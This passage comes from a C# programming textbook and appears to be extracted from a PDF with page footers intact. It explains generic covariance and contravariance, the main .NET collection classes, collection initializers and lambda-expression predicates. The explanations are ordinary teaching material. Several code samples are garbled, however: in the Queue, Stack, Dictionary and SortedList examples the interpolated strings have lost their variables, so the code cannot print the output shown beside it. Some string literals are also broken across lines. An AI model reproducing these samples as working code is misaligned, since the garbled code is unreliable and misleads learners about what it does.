IWrapper<object> storedObjectWrapper = stringWrapper;
This statement is similar to the one that creates the IWrapper<string>
reference in the previous code example, the difference being that the type
parameter is object rather than string. Is this code legal? Remember that all
strings are objects (you can assign a string value to an object reference, as
shown earlier), so in theory, this statement looks promising. However, if you
try it, the statement will fail to compile with the message “Cannot implicitly
convert type ‘Wrapper<string>’ to ‘IWrapper<object>’.”
You can try an explicit cast such as this:
Click here to view code image
IWrapper<object> storedObjectWrapper =
(IWrapper<object>)stringWrapper;
This code compiles but will fail at runtime with an InvalidCastException
exception. The problem is that although all strings are objects, the converse is
not true. If this statement were allowed, you could write code like this, which
ultimately attempts to store a Circle object in a string field:
Click here to view code image
IWrapper<object> storedObjectWrapper =
(IWrapper<object>)stringWrapper;
Circle myCircle = new Circle();
storedObjectWrapper.SetData(myCircle);
The IWrapper<T> interface is said to be invariant. You cannot assign an
IWrapper<A> object to a reference of type IWrapper<B>, even if type A is
derived from type B. By default, C# implements this restriction to ensure the
type safety of your code.
Covariant interfaces
Suppose that you defined the IStoreWrapper<T> and IRetrieveWrapper<T>
interfaces, shown in the following example, in place of IWrapper<T> and
implemented these interfaces in the Wrapper<T> class like this:
Click here to view code image
Download from finelybook [email protected]
599
interface IStoreWrapper<T>
{
void SetData(T data);
}
interface IRetrieveWrapper<T>
{
T GetData();
}
class Wrapper<T> : IStoreWrapper<T>, IRetrieveWrapper<T>
{
private T storedData;
void IStoreWrapper<T>.SetData(T data)
{
this.storedData = data;
}
T IRetrieveWrapper<T>.GetData()
{
return this.storedData;
}
}
Functionally, the Wrapper<T> class is the same as before, except that you
access the SetData and GetData methods through different interfaces.
Click here to view code image
Wrapper<string> stringWrapper = new Wrapper<string>();
IStoreWrapper<string> storedStringWrapper = stringWrapper;
storedStringWrapper.SetData("Hello");
IRetrieveWrapper<string> retrievedStringWrapper = stringWrapper;
Console.WriteLine($"Stored value is
{retrievedStringWrapper.GetData()}");
Thus, is the following code legal?
Click here to view code image
IRetrieveWrapper<object> retrievedObjectWrapper = stringWrapper;
The quick answer is no, and it fails to compile with the same error as
before. But if you think about it, although the C# compiler has deemed that
this statement is not type safe, the reasons for assuming this are no longer
valid. The IRetrieveWrapper<T> interface only allows you to read the data
held in the Wrapper<T> object by using the GetData method, and it does not
provide any way to change the data. In situations such as this where the type
Download from finelybook [email protected]
600
parameter occurs only as the return value of the methods in a generic
interface, you can inform the compiler that some implicit conversions are
legal and that it does not have to enforce strict type safety. You do this by
specifying the out keyword when you declare the type parameter, like this:
Click here to view code image
interface IRetrieveWrapper<out T>
{
T GetData();
}
This feature is called covariance. You can assign an
IRetrieveWrapper<A> object to an IRetrieve-Wrapper<B> reference as long
as there is a valid conversion from type A to type B, or type A derives from
type B. The following code now compiles and runs as expected:
Click here to view code image
// string derives from object, so this is now legal
IRetrieveWrapper<object> retrievedObjectWrapper = stringWrapper;
You can specify the out qualifier with a type parameter only if the type
parameter occurs as the return type of methods. If you use the type parameter
to specify the type of any method parameters, the out qualifier is illegal, and
your code will not compile. Also, covariance works only with reference
types. This is because value types cannot form inheritance hierarchies. So,
the following code will not compile because int is a value type:
Click here to view code image
Wrapper<int> intWrapper = new Wrapper<int>();
IStoreWrapper<int> storedIntWrapper = intWrapper; // this is legal
...
// the following statement is not legal - ints are not objects
IRetrieveWrapper<object>
retrievedObjectWrapper = intWrapper;
Several of the interfaces defined by the .NET Framework exhibit
covariance, including the IEnumerable<T> interface, which is detailed in
Chapter 19, “Enumerating collections.”
Download from finelybook [email protected]
601
Note Only interface and delegate types (which are covered in Chapter
18) can be declared as covariant. You do not specify the out modifier
with generic classes.
Contravariant interfaces
Contravariance follows a similar principle to covariance except that it works
in the opposite direction; it enables you to use a generic interface to reference
an object of type B through a reference to type A as long as type B derives
from type A. This sounds complicated, so it is worth looking at an example
from the .NET Framework class library.
The System.Collections.Generic namespace in the .NET Framework
provides an interface called IComparer, which looks like this:
Click here to view code image
public interface IComparer<in T>
{
int Compare(T x, T y);
}
A class that implements this interface has to define the Compare method,
which is used to compare two objects of the type specified by the T type
parameter. The Compare method is expected to return an integer value: zero
if the parameters x and y have the same value, negative if x is less than y, and
positive if x is greater than y. The following code shows an example that sorts
objects according to their hash code. (The GetHashCode method is
implemented by the Object class. It simply returns an integer value that
identifies the object. All reference types inherit this method and can override
it with their own implementations.)
Click here to view code image
class ObjectComparer : IComparer<Object>
{
int IComparer<Object>.Compare(Object x, Object y)
{
int xHash = x.GetHashCode();
int yHash = y.GetHashCode();
if (xHash == yHash) return 0;
if (xHash < yHash)
return -1;
Download from finelybook [email protected]
602
return 1;
}
}
You can create an ObjectComparer object and call the Compare method
through the IComparer<Object> interface to compare two objects, like this:
Click here to view code image
Object x = ...;
Object y = ...;
ObjectComparer objectComparer = new ObjectComparer();
IComparer<Object> objectComparator = objectComparer;
int result = objectComparator.Compare(x, y);
That’s the boring bit. What is more interesting is that you can reference
this same object through a version of the IComparer interface that compares
strings, like this:
Click here to view code image
IComparer<String> stringComparator = objectComparer;
At first glance, this statement seems to break every rule of type safety that
you can imagine. However, if you think about what the IComparer<T>
interface does, this approach makes sense. The purpose of the Compare
method is to return a value based on a comparison between the parameters
passed in. If you can compare Objects, you certainly should be able to
compare Strings, which are just specialized types of Objects. After all, a
String should be able to do anything that an Object can do—that is the
purpose of inheritance.
This still sounds a little presumptive, however. How does the C# compiler
know that you are not going to perform any type-specific operations in the
code for the Compare method that might fail if you invoke the method
through an interface based on a different type? If you revisit the definition of
the IComparer interface, you can see the in qualifier before the type
parameter:
Click here to view code image
public interface IComparer<in T>
{
int Compare(T x, T y);
}
Download from finelybook [email protected]
603
The in keyword tells the C# compiler that you can either pass the type T as
the parameter type to methods or pass any type that derives from T. You
cannot use T as the return type from any methods. Essentially, this makes it
possible for you to reference an object either through a generic interface
based on the object type or through a generic interface based on a type that
derives from the object type. Basically, if type A exposes some operations,
properties, or fields, in that case, if type B derives from type A, it must also
expose the same operations (which might behave differently if they have
been overridden), properties, and fields. Consequently, it should be safe to
substitute an object of type B for an object of type A.
Covariance and contravariance might seem like fringe topics in the world
of generics, but they are useful. For example, the List<T> generic collection
class (in the System.Collections.Generic namespace) uses IComparer<T>
objects to implement the Sort and BinarySearch methods. A List<Object>
object can contain a collection of objects of any type, so the Sort and
BinarySearch methods need to be able to sort objects of any type. Without
using contravariance, the Sort and BinarySearch methods would need to
include logic that determines the real types of the items being sorted or
searched and then implement a type-specific sort or search mechanism.
However, unless you are a mathematician, it can be quite difficult to recall
what covariance and contravariance actually do. The way I remember, based
on the examples in this section, is as follows:
Covariance example If the methods in a generic interface can return
strings, they can also return objects. (All strings are objects.)
Contravariance example If the methods in a generic interface can
take object parameters, they can take string parameters. (If you can
perform an operation by using an object, you can perform the same
operation by using a string because all strings are objects.)
Note As with covariance, only interface and delegate types can be
declared as contravariant. You do not specify the in modifier with
generic classes.
Download from finelybook [email protected]
604
Summary
In this chapter, you learned how to use generics to create type-safe classes.
You saw how to instantiate a generic type by specifying a type parameter.
You also saw how to implement a generic interface and define a generic
method. Finally, you learned how to define covariant and contravariant
generic interfaces that can operate with a hierarchy of types.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 18.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Instantiate an object
by using a generic
type
Specify the appropriate generic type parameter. For
example:
Click here to view code image
Queue<int> myQueue = new Queue<int>();
Create a new
generic type
Define the class by using a type parameter. For
example:
Click here to view code image
public class Tree<TItem>
...
}
Restrict the type
that can be
substituted for the
generic type
parameter
Specify a constraint by using a where clause when
defining the class. For example:
Click here to view code image
public class Tree<TItem>
where TItem : IComparable<TItem>
{
...
}
Download from finelybook [email protected]
605
Define a generic
method
Define the method by using type parameters. For
example:
Click here to view code image
static void InsertIntoTree<TItem>
(Tree<TItem> tree, params TItem[] data)
{
...
}
Invoke a generic
method
Provide types for each of the type parameters. For
example:
Click here to view code image
InsertIntoTree<char>(charTree, 'Z', 'X');
Define a covariant
interface
Specify the out qualifier for covariant type
parameters. Reference the covariant type parameters
only as the return types from methods and not as the
types for method parameters:
Click here to view code image
interface IRetrieveWrapper<out T>
{
T GetData();
}
Define a
contravariant
interface
Specify the in qualifier for contravariant type
parameters. Reference the contravariant type
parameters only as the types of method parameters
and not as return types:
Click here to view code image
public interface IComparer<in T>
{
int Compare(T x, T y);
}
Download from finelybook [email protected]
606
CHAPTER 18
Using collections
After completing this chapter, you will be able to:
Explain the functionality provided in the different collection classes
available with the .NET Framework.
Create type-safe collections.
Populate a collection with a set of data.
Manipulate and access the data items held in a collection.
Search a list-oriented collection for matching items by using a
predicate.
Chapter 10, “Using arrays,” introduces arrays for holding sets of data.
Arrays are very useful in this respect, but they have their limitations. Arrays
provide only limited functionality; for example, it is not easy to increase or
reduce the size of an array, and neither is it a simple matter to sort the data
held in an array. Also, arrays only really provide a single means of accessing
data—by using an integer index. If your application needs to store and
retrieve data by using some other mechanism, such as the first-in, first-out
queue mechanism described in Chapter 17, “Introducing generics,” arrays
might not be the most suitable data structure to use. This is where collections
can prove useful.
What are collection classes?
Download from finelybook [email protected]
607
The Microsoft .NET Framework provides several classes that collect
elements together such that an application can access the elements in
specialized ways. These are the collection classes mentioned in Chapter 17,
and they live in the System.Collections.Generic namespace.
As the namespace implies, these collections are generic types; they all
expect you to provide a type parameter indicating the kind of data that your
application will be storing in them. Each collection class is optimized for a
particular form of data storage and access, and each provides specialized
methods that support this functionality. For example, the Stack<T> class
implements a last-in, first-out model, where you add an item to the top of the
stack by using the Push method, and you take an item from the top of the
stack by using the Pop method. The Pop method always retrieves the most
recently pushed item and removes it from the stack. In contrast, the
Queue<T> type provides the Enqueue and Dequeue methods described in
Chapter 17. The Enqueue method adds an item to the queue, while the
Dequeue method retrieves items from the queue in the same order,
implementing a first-in, first-out model. A variety of other collection classes
are also available, and the following table provides a summary of the most
commonly used ones.
Collection
Description
List<T>
A list of objects that can be accessed by index, as with
an array, but with additional methods with which to
search the list and sort the contents of the list.
Queue<T>
A first-in, first-out data structure, with methods to add
an item to one end of the queue, remove an item from
the other end, and examine an item without removing it.
Stack<T>
A first-in, last-out data structure with methods to push
an item onto the top of the stack, pop an item from the
top of the stack and examine the item at the top of the
stack without removing it.
LinkedList<T>
A double-ended ordered list, optimized to support
insertion and removal at either end. This collection can
act like a queue or a stack, but it also supports random
access as a list does.
HashSet<T>
An unordered set of values that is optimized for fast
Download from finelybook [email protected]
608
retrieval of data. It provides set-oriented methods for
determining whether the items it holds are a subset of
those in another HashSet<T> object as well as
computing the intersection and union of HashSet<T>
objects.
Dictionary<TKey,
TValue>
A collection of values that can be identified and
retrieved by using keys rather than indexes.
SortedList<TKey,
TValue>
A sorted list of key/value pairs. The keys must
implement the IComparable<T> interface.
The following sections provide a brief overview of these collection
classes. Refer to the .NET Framework class library documentation for more
details on each class.
Note The .NET Framework class library also provides another set of
collection types in the System.Collections namespace. These are
nongeneric collections, and they were designed before C# supported
generic types (generics were added to the version of C# developed for
the .NET Framework version 2.0). With one exception, these types all
store object references, and you are required to perform the appropriate
casts when you store and retrieve items. These classes are included for
backward compatibility with existing applications, and it is not
recommended that you use them when building new solutions. In fact,
these classes are not available if you are building Universal Windows
Platform (UWP) apps.
The one class that does not store object references is the BitArray
class. This class implements a compact array of Boolean values by
using an int; each bit indicates true (1) or false (0). If this sounds
familiar, it should; this is very similar to the IntBits struct that you saw
in the examples in Chapter 16, “Handling binary data and using
indexers.” The BitArray class is available to UWP apps.
One other important set of collections is available, and these classes
are defined in the System.Collections.Concurrent namespace. These are
Download from finelybook [email protected]
609
thread-safe collection classes that you can use when you’re building
multithreaded applications. Chapter 24, “Improving response time by
performing asynchronous operations,” provides more information on
these classes.
The List<T> collection class
The generic List<T> class is the simplest of the collection classes. You can
use it much like you use an array—you can reference an existing element in a
List<T> collection by using ordinary array notation, with square brackets and
the index of the element, although you cannot use array notation to add new
elements. However, in general, the List<T> class provides more flexibility
than arrays do and is designed to overcome the following restrictions
exhibited by arrays:
If you want to resize an array, you have to create a new array, copy the
elements (leaving out some if the new array is smaller), and then
update any references to the original array so that they refer to the new
array.
If you want to remove an element from an array, you have to move all
the trailing elements up by one place. Even this doesn’t quite work
because you end up with two copies of the last element.
If you want to insert an element into an array, you have to move
elements down by one place to make a free slot. However, you lose the
last element of the array!
The List<T> collection class provides the following features that preclude
these limitations:
You don’t need to specify the capacity of a List<T> collection when
you create it; it can grow and shrink as you add elements. There is an
overhead associated with this dynamic behavior, and if necessary, you
can specify an initial size. However, if you exceed this size, the
List<T> collection simply grows as necessary.
You can remove a specified element from a List<T> collection by
using the Remove method. The List<T> collection automatically
Download from finelybook [email protected]
610
reorders its elements and closes the gap. You can also remove an item
at a specified position in a List<T> collection by using the RemoveAt
method.
You can add an element to the end of a List<T> collection by using its
Add method. You supply the element to be added. The List<T>
collection resizes itself automatically.
You can insert an element into the middle of a List<T> collection by
using the Insert method. Again, the List<T> collection resizes itself.
You can easily sort the data in a List<T> object by calling the Sort
method.
Note As with arrays, if you use foreach to iterate through a List<T>
collection, you cannot use the iteration variable to modify the contents
of the collection. Additionally, you cannot call the Remove, Add, or
Insert method in a foreach loop that iterates through a
List<T> collection; any attempt to do so results in an
InvalidOperationException exception.
Here’s an example that shows how you can create, manipulate, and iterate
through the contents of a List<int> collection:
Click here to view code image
using System;
using System.Collections.Generic;
...
List<int> numbers = new List<int>();
// Fill the List<int> by using the Add method
foreach (int number in new int[12]{10, 9, 8, 7, 7, 6, 5, 10, 4, 3, 2,
1})
{
numbers.Add(number);
}
// Insert an element in the penultimate position in the list, and
move the last item up
// The first parameter is the position; the second parameter is the
Download from finelybook [email protected]
611
value being inserted
numbers.Insert(numbers.Count-1, 99);
// Remove the first element whose value is 7 (the 4th element, index
3)
numbers.Remove(7);
// Remove the element that's now the 7th element,
numbers.RemoveAt(6);
// Iterate the remaining 11 elements using a for statement
Console.WriteLine("Iterating using a for statement:");
for (int i = 0; i < numbers.Count; i++)
{
int number = numbers[i]; // Note the use of array syntax
Console.WriteLine(number);
}
// Iterate the same 11 elements using a foreach statement
Console.WriteLine("\nIterating using a foreach statement:");
foreach (int number in numbers)
{
Console.WriteLine(number);
}
Here is the output of this code:
Click here to view code image
Iterating using a for statement:
10
9
8
7
6
5
4
3
2
99
1
Iterating using a foreach statement:
10
9
8
7
6
5
4
3
2
Download from finelybook [email protected]
612
99
1
Note The way you determine the number of elements for a List<T>
collection is different from querying the number of items in an array.
When using a List<T> collection, you examine the Count property;
when using an array, you examine the Length property.
The LinkedList<T> collection class
The LinkedList<T> collection class implements a doubly linked list. Each
item in the list holds the value for that item together with a reference to the
next item in the list (the Next property) and the previous item (the Previous
property). The item at the start of the list has the Previous property set to null,
and the item at the end of the list has the Next property set to null.
Unlike the List<T> class, LinkedList<T> does not support array notation
for inserting or examining elements. Instead, you can use the AddFirst
method to insert an element at the start of the list, moving the previous first
item up and setting its Previous property to refer to the new item. Similarly,
you can use the AddLast method to insert an element at the end of the list,
setting the Next property of the previously last item to refer to the new item.
You can also use the AddBefore and AddAfter methods to insert an element
before or after a specified item in the list (you have to retrieve the item first).
You can find the first item in a LinkedList<T> collection by querying the
First property, whereas the Last property returns a reference to the final item
in the list. To iterate through a linked list, you can start at one end and step
through the Next or Previous references until you find an item with a null
value for this property. Alternatively, you can use a foreach statement, which
iterates forward through a LinkedList<T> object and stops automatically at
the end.
You delete an item from a LinkedList<T> collection by using the Remove,
RemoveFirst, and RemoveLast methods.
Download from finelybook [email protected]
613
The following example shows a LinkedList<T> collection in action.
Notice how the code that iterates through the list by using a for statement
steps through the Next (or Previous) references, stopping only when it
reaches a null reference, which is the end of the list:
Click here to view code image
using System;
using System.Collections.Generic;
...
LinkedList<int> numbers = new LinkedList<int>();
// Fill the List<int> by using the AddFirst method
foreach (int number in new int[] { 10, 8, 6, 4, 2 })
{
numbers.AddFirst(number);
}
// Iterate using a for statement
Console.WriteLine("Iterating using a for statement:");
for (LinkedListNode<int> node = numbers.First; node != null; node =
node.Next)
{
int number = node.Value;
Console.WriteLine(number);
}
// Iterate using a foreach statement
Console.WriteLine("\nIterating using a foreach statement:");
foreach (int number in numbers)
{
Console.WriteLine(number);
}
// Iterate backwards
Console.WriteLine("\nIterating list in reverse order:");
for (LinkedListNode<int> node = numbers.Last; node != null; node =
node.Previous)
{
int number = node.Value;
Console.WriteLine(number);
}
Here is the output generated by this code:
Click here to view code image
Iterating using a for statement:
2
4
Download from finelybook [email protected]
614
6
8
10
Iterating using a foreach statement:
2
4
6
8
10
Iterating list in reverse order:
10
8
6
4
2
The Queue<T> collection class
The Queue<T> class implements a first-in, first-out mechanism. An element
is inserted into the queue at the back (the Enqueue operation) and is removed
from the queue at the front (the Dequeue operation).
The following code is an example showing a Queue<int> collection and
its common operations:
Click here to view code image
using System;
using System.Collections.Generic;
...
Queue<int> numbers = new Queue<int>();
// fill the queue
Console.WriteLine("Populating the queue:");
foreach (int number in new int[4]{9, 3, 7, 2})
{
numbers.Enqueue(number);
Console.WriteLine($" has joined the queue");
}
// iterate through the queue
Console.WriteLine("\nThe queue contains the following items:");
foreach (int number in numbers)
{
Console.WriteLine(number);
}
// empty the queue
Download from finelybook [email protected]
615
Console.WriteLine("\nDraining the queue:");
while (numbers.Count > 0)
{
int number = numbers.Dequeue();
Console.WriteLine($" has left the queue");
}
Here is the output from this code:
Click here to view code image
Populating the queue:
9 has joined the queue
3 has joined the queue
7 has joined the queue
2 has joined the queue
The queue contains the following items:
9
3
7
2
Draining the queue:
9 has left the queue
3 has left the queue
7 has left the queue
2 has left the queue
The Stack<T> collection class
The Stack<T> class implements a last-in, first-out mechanism. An element
joins the stack at the top (the push operation) and leaves the stack at the top
(the pop operation). To visualize this, think of a stack of dishes: new dishes
are added to the top and dishes are removed from the top, making the last
dish to be placed on the stack the first one to be removed. (The dish at the
bottom is rarely used and will inevitably require washing before you can put
any food on it—because it will be covered in grime!) Here’s an example—
notice the order in which the items are listed by the foreach loop:
Click here to view code image
using System;
using System.Collections.Generic;
...
Stack<int> numbers = new Stack<int>();
// fill the stack
Console.WriteLine("Pushing items onto the stack:");
Download from finelybook [email protected]
616
foreach (int number in new int[4]{9, 3, 7, 2})
{
numbers.Push(number);
Console.WriteLine($" has been pushed on the stack");
}
// iterate through the stack
Console.WriteLine("\nThe stack now contains:");
foreach (int number in numbers)
{
Console.WriteLine(number);
}
// empty the stack
Console.WriteLine("\nPopping items from the stack:");
while (numbers.Count > 0)
{
int number = numbers.Pop();
Console.WriteLine($" has been popped off the stack");
}
Here is the output from this program:
Click here to view code image
Pushing items onto the stack:
9 has been pushed on the stack
3 has been pushed on the stack
7 has been pushed on the stack
2 has been pushed on the stack
The stack now contains:
2
7
3
9
Popping items from the stack:
2 has been popped off the stack
7 has been popped off the stack
3 has been popped off the stack
9 has been popped off the stack
The Dictionary<TKey, TValue> collection class
The array and List<T> types provide a way to map an integer index to an
element. You specify an integer index within square brackets (for example,
[4]), and you get back the element at index 4 (which is actually the fifth
element). However, sometimes you might want to implement a mapping in
which the type from which you map is not an int but some other type, such as
Download from finelybook [email protected]
617
string, double, or Time. In other languages, this is often called an associative
array. The Dictionary<TKey, TValue> class implements this functionality by
internally maintaining two arrays, one for the keys from which you’re
mapping and one for the values to which you’re mapping. When you insert a
key/value pair into a Dictionary<TKey, TValue> collection, it automatically
tracks which key belongs to which value and makes it possible for you to
retrieve the value that is associated with a specified key quickly and easily.
The design of the Dictionary<TKey, TValue> class has some important
consequences:
A Dictionary<TKey, TValue> collection cannot contain duplicate keys.
If you call the Add method to add a key that is already present in the
keys array, you’ll get an exception. You can, however, use the square
brackets notation to add a key/value pair (as shown in the following
example) without danger of an exception, even if the key has already
been added; any existing value with the same key will be overwritten
by the new value. You can test whether a Dictionary<TKey, TValue>
collection already contains a particular key by using the ContainsKey
method.
Internally, a Dictionary<TKey, TValue> collection is a sparse data
structure that operates most efficiently when it has plenty of memory
with which to work. The size of a Dictionary<TKey, TValue>
collection in memory can grow quite quickly as you insert more
elements.
When you use a foreach statement to iterate through a
Dictionary<TKey, TValue> collection, you get back a
KeyValuePair<TKey, TValue> item. This is a structure that contains a
copy of the key and value elements of an item in the Dictionary<TKey,
TValue> collection, and you can access each element through the Key
property and the Value property. These elements are read-only; you
cannot use them to modify the data in the Dictionary<TKey, TValue>
collection.
Here is an example that associates the ages of members of my family with
their names and then prints the information:
Click here to view code image
using System;
Download from finelybook [email protected]
618
using System.Collections.Generic;
...
Dictionary<string, int> ages = new Dictionary<string, int>();
// fill the Dictionary
ages.Add("John", 53); // using the Add method
ages.Add("Diana", 53);
ages["James"] = 26; // using array notation
ages["Francesca"] = 23;
// iterate using a foreach statement
// the iterator generates a KeyValuePair item
Console.WriteLine("The Dictionary contains:");
foreach (KeyValuePair<string, int> element in ages)
{
string name = element.Key;
int age = element.Value;
Console.WriteLine($"Name: , Age: ");
}
Here is the output from this program:
Click here to view code image
The Dictionary contains:
Name: John, Age: 53
Name: Diana, Age: 53
Name: James, Age: 26
Name: Francesca, Age: 23
Note The System.Collections.Generic namespace also includes the
SortedDictionary<TKey, TValue> collection type. This class maintains
the collection in order, sorted by the keys.
The SortedList<TKey, TValue> collection class
The SortedList<TKey, TValue> class is very similar to the Dictionary<TKey,
TValue> class in that you can use it to associate keys with values. The
primary difference is that the keys array is always sorted. (It is called a
SortedList, after all.) It takes longer to insert data into a SortedList<TKey,
TValue> object than a SortedDictionary<TKey, TValue> object in most
Download from finelybook [email protected]
619
cases, but data retrieval is often quicker (or at least as quick), and the
SortedList<TKey, TValue> class uses less memory.
When you insert a key/value pair into a SortedList<TKey, TValue>
collection, the key is inserted into the keys array at the correct index to keep
the keys array sorted. The value is then inserted into the values array at the
same index. The SortedList<TKey, TValue> class automatically ensures that
keys and values remain synchronized, even when you add and remove
elements. This means that you can insert key/value pairs into a
SortedList<TKey, TValue> in any sequence; they are always sorted based on
the value of the keys.
Like the Dictionary<TKey, TValue> class, a SortedList<TKey, TValue>
collection cannot contain duplicate keys. When you use a foreach statement
to iterate through a SortedList<TKey, TValue>, you receive back a
KeyValuePair<TKey, TValue> item. However, the KeyValuePair<TKey,
TValue> items will be returned sorted by the Key property.
Here is the same example that associates the ages of members of my
family with their names and then prints the information, but this version has
been adjusted to use a SortedList<TKey, TValue> object rather than a
Dictionary<TKey, TValue> collection:
Click here to view code image
using System;
using System.Collections.Generic;
...
SortedList<string, int> ages = new SortedList<string, int>();
// fill the SortedList
ages.Add("John", 53); // using the Add method
ages.Add("Diana", 53);
ages["James"] = 26; // using array notation
ages["Francesca"] = 23;
// iterate using a foreach statement
// the iterator generates a KeyValuePair item
Console.WriteLine("The SortedList contains:");
foreach (KeyValuePair<string, int> element in ages)
{
string name = element.Key;
int age = element.Value;
Console.WriteLine($"Name: , Age: ");
}
Download from finelybook [email protected]
620
The output from this program is sorted alphabetically by the names of my
family members:
Click here to view code image
The SortedList contains:
Name: Diana, Age: 53
Name: Francesca, Age: 23
Name: James, Age: 26
Name: John, Age: 53
The HashSet<T> collection class
The HashSet<T> class is optimized for performing set operations, such as
determining set membership and generating the union and intersection of
sets.
You insert items into a HashSet<T> collection by using the Add method,
and you delete items by using the Remove method. However, the real power
of the HashSet<T> class is provided by the IntersectWith, UnionWith, and
ExceptWith methods. These methods modify a HashSet<T> collection to
generate a new set that either intersects with, has a union with, or does not
contain the items in a specified HashSet<T> collection. These operations are
destructive in as much as they overwrite the contents of the original
HashSet<T> object with the new set of data. You can also determine whether
the data in one HashSet<T> collection is a superset or subset of another by
using the IsSubsetOf, IsSupersetOf, IsProperSubsetOf, and
IsProperSupersetOf methods. These methods return a Boolean value and are
nondestructive.
Internally, a HashSet<T> collection is held as a hash table, enabling the
fast lookup of items. However, a large HashSet<T> collection can require a
significant amount of memory to operate quickly.
The following example shows how to populate a HashSet<T> collection
and illustrates the use of the IntersectWith method to find data that overlaps
two sets:
Click here to view code image
using System;
using System.Collections.Generic;
...
Download from finelybook [email protected]
621
HashSet<string> employees = new HashSet<string>(new string[]
{"Fred","Bert","Harry","John"});
HashSet<string> customers = new HashSet<string>(new string[]
{"John","Sid","Harry","Diana"});
employees.Add("James");
customers.Add("Francesca");
Console.WriteLine("Employees:");
foreach (string name in employees)
{
Console.WriteLine(name);
}
Console.WriteLine("");
Console.WriteLine("Customers:");
foreach (string name in customers)
{
Console.WriteLine(name);
}
Console.WriteLine("\nCustomers who are also employees:");
customers.IntersectWith(employees);
foreach (string name in customers)
{
Console.WriteLine(name);
}
This code generates the following output:
Click here to view code image
Employees:
Fred
Bert
Harry
John
James
Customers:
John
Sid
Harry
Diana
Francesca
Customers who are also employees:
John
Harry
Download from finelybook [email protected]
622
Note The System.Collections.Generic namespace also provides the
SortedSet<T> collection type, which operates similarly to the
HashSet<T> class. The primary difference, as the name implies, is that
the data is maintained in a sorted order. The SortedSet<T> and
HashSet<T> classes are interoperable; you can take the union of a
SortedSet<T> collection with a HashSet<T> collection, for example.
Using collection initializers
The examples in the preceding subsections have shown you how to add
individual elements to a collection by using the method most appropriate to
that collection (Add for a List<T> collection, Enqueue for a Queue<T>
collection, Push for a Stack<T> collection, and so on). You can also initialize
some collection types when you declare them by using a syntax similar to that
supported by arrays. For example, the following statement creates and
initializes the numbers List<int> object shown earlier, demonstrating an
alternative to repeatedly calling the Add method:
Click here to view code image
List<int> numbers = new List<int>(){10, 9, 8, 7, 7, 6, 5, 10, 4, 3,
2, 1};
Internally, the C# compiler converts this initialization to a series of calls to
the Add method. Consequently, you can use this syntax only for collections
that actually support the Add method. (The Stack<T> and Queue<T> classes
do not.)
For more complex collections that take key/value pairs, such as the
Dictionary<TKey, TValue> class, you can use indexer notation to specify a
value for each key, like this:
Click here to view code image
Dictionary<string, int> ages = new Dictionary<string, int>()
{
["John"] = 53,
Download from finelybook [email protected]
623
["Diana"] = 53,
["James"] = 26,
["Francesca"] = 23
};
If you prefer, you can also specify each key/value pair as an anonymous
type in the initializer list, like this:
Click here to view code image
Dictionary<string, int> ages = new Dictionary<string, int>()
{
{"John", 53},
{"Diana", 53},
{"James", 26},
{"Francesca", 23}
};
In this case, the first item in each pair is the key, and the second is the
value. To make your code as readable as possible, I recommend that you use
the indexer notation wherever possible when you initialize a dictionary type.
The Find methods, predicates, and lambda expressions
Using the dictionary-oriented collections (Dictionary<TKey, TValue>,
SortedDictionary<TKey, TValue>, and SortedList<TKey, TValue>), you can
quickly find a value by specifying the key to search for, and you can use
array notation to access the value, as you have seen in earlier examples. Other
collections that support nonkeyed random access, such as the List<T> and
LinkedList<T> classes, do not support array notation but instead provide the
Find method to locate an item. For these classes, the argument to the Find
method is a predicate that specifies the search criteria to use. The form of a
predicate is a method that examines each item in the collection and returns a
Boolean value indicating whether the item matches. In the case of the Find
method, as soon as the first match is found, the corresponding item is
returned. Note that the List<T> and LinkedList<T> classes also support
other methods, such as FindLast, which returns the last matching object, and
the List<T> class additionally provides the FindAll method, which returns a
List<T> collection of all matching objects.
The easiest way to specify the predicate is to use a lambda expression. A
lambda expression is an expression that returns a method. This sounds rather
Download from finelybook [email protected]
624
odd because most expressions that you have encountered so far in C# actually
return a value. If you are familiar with functional programming languages
such as Haskell, you are probably comfortable with this concept. If you are
not, fear not: lambda expressions are not particularly complicated, and after
you have become accustomed to a new bit of syntax, you will see that they
are very useful.
Note If you are interested in finding out more about functional
programming with Haskell, visit the Haskell programming language
website at http://www.haskell.org/haskellwiki/.
Chapter 3, “Writing methods and applying scope,” explains that a typical
method consists of four elements: a return type, a method name, a list of
parameters, and a method body. A lambda expression contains two of these
elements: a list of parameters and a method body. Lambda expressions do not
define a method name, and the return type (if any) is inferred from the
context in which the lambda expression is used. In the case of the Find
method, the predicate processes each item in the collection in turn; the body
of the predicate must examine the item and return true or false depending on
whether it matches the search criteria. The example that follows shows the
Find method (highlighted in bold) on a List<Person> collection, where
Person is a struct. The Find method returns the first item in the list that has
the ID property set to 3:
Click here to view code image
struct Person
{
public int ID { get; set; }
public string Name { get; set; }
public int Age { get; set; }
}
...
// Create and populate the personnel list
List<Person> personnel = new List<Person>()
{
new Person() { ID = 1, Name = "John", Age = 53 },
new Person() { ID = 2, Name = "Sid", Age = 28 },
Download from finelybook [email protected]
625
new Person() { ID = 3, Name = "Fred", Age = 34 },
new Person() { ID = 4, Name = "Paul", Age = 22 },
};
// Find the member of the list that has an ID of 3
Person match = personnel.Find((Person p) => { return p.ID == 3; });
Console.WriteLine($"ID: {match.ID}\nName: {match.Name}\nAge:
{match.Age}");
Here is the output generated by this code:
ID: 3
Name: Fred
Age: 34
In the call to the Find method, the argument (Person p) => { return p.ID
== 3; } is a lambda expression that actually does the work. It has the
following syntactic items:
A list of parameters enclosed in parentheses. As with a regular method,
if the method you are defining (as in the preceding example) takes no
parameters, you must still provide the parentheses. In the case of the
Find method, the predicate is provided with each item from the
collection in turn, and this item is passed as the parameter to the
lambda expression.
The => operator, which indicates to the C# compiler that this is a
lambda expression.
The body of the method. The example shown here is very simple,
containing a single statement that returns a Boolean value indicating
whether the item specified in the parameter matches the search criteria.
However, a lambda expression can contain multiple statements, and
you can format it in whatever way you feel is most readable. Just
remember to add a semicolon after each statement, as you would in an
ordinary method.
Important You also saw in Chapter 3 how the => operator is used to
define expression-bodied methods. Rather confusingly, this is a
somewhat overloaded use of the => operator. Although there are some
notional similarities, expression-bodied methods and lambda
Download from finelybook [email protected]
626
expressions are semantically (and functionally) quite different beasts;
you should not confuse them.
Strictly speaking, the body of a lambda expression can be a method body
containing multiple statements or be a single expression. If the body of a
lambda expression contains only a single expression, you can omit the braces
and the semicolon (but you still need a semicolon to complete the entire
statement). Additionally, if the expression takes a single parameter, you can
